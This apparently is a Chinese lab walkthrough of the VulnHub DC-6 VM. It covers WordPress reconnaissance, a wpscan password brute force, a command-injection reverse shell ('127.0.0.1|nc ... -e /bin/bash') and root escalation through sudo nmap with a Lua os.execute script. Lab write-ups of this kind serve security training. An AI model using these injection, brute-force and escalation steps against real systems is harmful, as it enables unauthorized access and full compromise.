VulnHub-DC-6靶机-wpscan爆破+命令注入反弹shell+nmap提权

一、环境搭建

选择扫描虚拟机

选择靶机路径

这里如果出现报错,无法导入,如VMware出现配置文件 .vmx 是由VMware产品创建,但该产品与此版 VMware workstation 不兼容,因此无法使用(VMware版本不兼容问题),可以修改**.vmx**文件版本和虚拟机一致

二、信息收集

扫描ip

bash 复制代码
nmap -sn 192.168.108.142

扫描开放端口

得到以下信息

bash 复制代码
#PORT  STATE 应用层协议
22/tcp open  ssh
80/tcp open  http

扫描服务信息

得到以下信息

bash 复制代码
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)   #协议版本
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

指纹探测

bash 复制代码
nmap 192.168.108.142 -p 22,80 -sV -sC -O --version-all 

得到以下信息

bash 复制代码
运行系统:linux3.x|4.x
操作系统:linux 3.2-4.9
操作系统CPE:cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4  #o-操作系统;linux-供应商;linux_kernel-产品;3-版本号

目录扫描

先使用dirb

bash 复制代码
dirb http://192.168.108.142

暴露了很多目录

dirbsearch扫描以下

bash 复制代码
dirsearch -u http://192.168.108.142 -e*

有很多目录

总结一下目录,这里只看访问成功的目录

php 复制代码
http://192.168.108.142/index.php     
http://192.168.108.142/server-status    
http://192.168.108.142/license.txt                                      
http://192.168.108.142/readme.html

http://192.168.108.142/wp-config.php
http://192.168.108.142/wp-content/                                                                                                                                                  
http://192.168.108.142/wp-includes/
http://192.168.108.142/wp-login.php
http://192.168.108.142/wp-cron.php


http://192.168.108.142/wp-admin/ 
http://192.168.108.142/wp-admin/install.php
http://192.168.108.142/wp-admin/admin.php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
http://192.168.108.142/wp-admin/network/                                                                                                                                            
http://192.168.108.142/wp-admin/user/

三、Web渗透

打开环境,无法正常访问

设置域名解析

首先如果浏览器访问过该网站,需要找到浏览器缓存,这里我使用的火狐浏览器,点击管理数据

找到刚才的网站,删除缓存

在下面的目录下,选择host属性

复制代码
C:\Windows\System32\drivers\etc

设置权限

设置之后在记事本编辑,设置如下,靶机ip 域名

然后刷新缓存即可

成功访问

网站渗透

先看看网站指纹信息,使用了wordpress 个管理系统,应该是有后台

查看上面扫描出来的目录,找到一个登录入口wp-login.php ,但是没有账户密码,尝试弱口令,发现存在admin用户,但是不知道密码,爆破无果

使用wpscan枚举用户信息,得到五个账户

bash 复制代码
wpscan --url http://wordy -e  #枚举账户信息
admin,mark,graham,sraah,jens

准备一个用户列表

在该靶机官网发现以下信息,提示我们用此密码表

bash 复制代码
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt #那应该可以节省你几年的时间

这个密码字典使用前需要解压

bash 复制代码
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt |grep k01 > passwords.txt

拿到一个账号密码

bash 复制代码
wpscan --url http://wordy -U user.txt -P passwords.txt
Username: mark, Password: helpdesk01

后台反弹shell

进入后台后发现一个命令注入框,每次使用需要点击lookup ,先看看ip

测试几个命令,发现可以执行

尝试反弹shell,发现输入框长度限制,修改一下

反弹shell

bash 复制代码
127.0.0.1|nc 192.168.108.142 4444 -e /bin/bash

反弹成功

四、提权

先找找有用信息

利用python获取一个稳定shell

bash 复制代码
python -c "import pty;pty.spawn('/bin/bash')"

进入home目录看看

发现几个用户文件,因为我们是mark登录进来的,先看这个

有一个stuff文件,进去看看,发现一个账号密码

bash 复制代码
Add new user: graham - GSo7isUM1D4

进入graham看看有没有什么信息

看看其他目录,只有在jens 目录下发现一个backups.sh文件

ssh连接graham用户

并没有什么有用信息

sudo -l 发现可以免密执行,此命令用于列出当前用户在使用 sudo 执行命令时具有的权限和可运行的命令

写入shell并利用jens账户执行

root权限nmap提权

看看此账户权限,有一个root的nmap命令可以使用,可以利用此来提权

写一个脚本并用nmap命令执行

bash 复制代码
echo "os.execute('/bin/bash')" > shell.sh
sudo nmap --script=shell.sh

提权成功

相关推荐
2401_8589368810 分钟前
【Linux C 编程】标准 IO 详解与实战:从基础接口到文件操作实战
linux·c语言
Roc.Chang22 分钟前
Ubuntu 下 VLC 无法启动(Segmentation fault)终极解决方案
linux·ubuntu·vlc·媒体播放
松涛和鸣1 小时前
72、IMX6ULL驱动实战:设备树(DTS/DTB)+ GPIO子系统+Platform总线
linux·服务器·arm开发·数据库·单片机
简单中的复杂1 小时前
【避坑指南】RK3576 Linux SDK 编译:解决 Buildroot 卡死在 host-gcc-final 的终极方案
linux·嵌入式硬件
白帽子凯哥哥1 小时前
湖南网安基地:国家级实战化网安人才培养的“黄埔军校”
web安全·信息安全·零基础·渗透测试·安全服务
wVelpro2 小时前
如何在Pycharm 2025.3 版本实现虚拟环境“Make available to all projects”
linux·ide·pycharm
程序员老舅2 小时前
C++高并发精髓:无锁队列深度解析
linux·c++·内存管理·c/c++·原子操作·无锁队列
雨中风华3 小时前
Linux, macOS系统实现远程目录访问(等同于windows平台xFsRedir软件的目录重定向)
linux·windows·macos
爱吃生蚝的于勒3 小时前
【Linux】进程信号之捕捉(三)
linux·运维·服务器·c语言·数据结构·c++·学习
The森3 小时前
Linux IO 模型纵深解析 01:从 Unix 传统到 Linux 内核的 IO 第一性原理
linux·服务器·c语言·经验分享·笔记·unix